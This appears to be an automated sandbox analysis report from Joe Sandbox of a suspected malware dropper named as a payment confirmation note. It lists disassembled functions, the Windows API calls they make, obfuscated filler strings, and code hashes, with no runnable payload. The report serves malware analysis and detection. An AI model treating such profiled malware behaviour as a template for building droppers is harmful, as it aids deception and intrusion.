Function 00403324 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061DF
Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 004061F3
Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403330,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00406206

CreateDirectoryW.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403510), ref: 00403345

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403325, 0040332A, 00403330, 0040333C, 00403344, 0040334B
1033, xrefs: 0040334C

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user~1\AppData\Local\Temp\
API String ID: 4115351271-3049706366
Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE

Function 00406972 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44

Function 00406B73 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48

Function 00406889 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45

Function 004067DC Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54

Function 004068FA Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48

Function 00406846 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44

Function 00405BD7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00405BDA

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: FileRead
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 2738559852-2559241417
Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D

Function 004022D3 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
RegCloseKey.ADVAPI32(00000000), ref: 004022FB

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A

Function 00405265 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405275

Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B

OleUninitialize.OLE32(00000404,00000000), ref: 004052C1

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D

Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
EnableWindow.USER32(00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
Opcode Fuzzy Hash: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E

Function 00405B54 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe,80000000,00000003), ref: 00405B58
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267550574.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Confirmation transfer Note AGS # 22-00379.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16

Function 00405B2F Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48

Memory Dump Source

Source File: 00000000.00000002.1267303834.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1267289005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267320686.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267336668.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
